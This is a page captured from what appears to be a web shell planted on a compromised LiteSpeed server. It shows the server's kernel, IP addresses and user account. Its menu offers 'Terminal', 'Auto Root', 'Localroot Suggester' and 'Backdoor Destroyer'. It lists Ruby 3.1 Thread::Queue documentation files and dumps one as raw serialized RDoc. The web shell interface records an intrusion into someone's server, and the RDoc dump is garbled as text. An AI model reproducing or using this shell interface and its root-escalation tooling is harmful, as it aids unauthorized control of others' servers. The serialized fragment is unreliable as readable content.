Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.60
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby31 /
share /
ri /
system /
Thread /
Queue /
Delete
Unzip
Name
Size
Permission
Date
Action
%3c%3c-i.ri
337
B
-rw-r--r--
2025-04-28 21:06
cdesc-Queue.ri
1.59
KB
-rw-r--r--
2025-04-28 21:06
clear-i.ri
304
B
-rw-r--r--
2025-04-28 21:06
close-i.ri
1.27
KB
-rw-r--r--
2025-04-28 21:06
closed%3f-i.ri
325
B
-rw-r--r--
2025-04-28 21:06
deq-i.ri
560
B
-rw-r--r--
2025-04-28 21:06
empty%3f-i.ri
321
B
-rw-r--r--
2025-04-28 21:06
enq-i.ri
339
B
-rw-r--r--
2025-04-28 21:06
length-i.ri
336
B
-rw-r--r--
2025-04-28 21:06
new-c.ri
812
B
-rw-r--r--
2025-04-28 21:06
num_waiting-i.ri
332
B
-rw-r--r--
2025-04-28 21:06
pop-i.ri
629
B
-rw-r--r--
2025-04-28 21:06
push-i.ri
377
B
-rw-r--r--
2025-04-28 21:06
shift-i.ri
564
B
-rw-r--r--
2025-04-28 21:06
size-i.ri
334
B
-rw-r--r--
2025-04-28 21:06
Save
Rename
U:RDoc::AnyMethod[iI"new:ETI"Thread::Queue::new;TT:privateo:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [I"TCreates a new queue instance, optionally using the contents of an +enumerable+ ;TI"for its initial state.;To:RDoc::Markup::BlankLine o; ; [I" Example:;T@o:RDoc::Markup::Verbatim; [I"q = Thread::Queue.new ;TI"-#=> #<Thread::Queue:0x00007ff7501110d0> ;TI"q.empty? ;TI"#=> true ;TI" ;TI"&q = Thread::Queue.new([1, 2, 3]) ;TI"-#=> #<Thread::Queue:0x00007ff7500ec500> ;TI"q.empty? ;TI"#=> false ;TI"q.pop ;TI" #=> 1;T:@format0: @fileI"thread_sync.c;T:0@omit_headings_from_table_of_contents_below0I"MThread::Queue.new -> empty_queue Thread::Queue.new(enumerable) -> queue ;T0[ I"(p1 = v1);T@ FI" Queue;TcRDoc::NormalClass00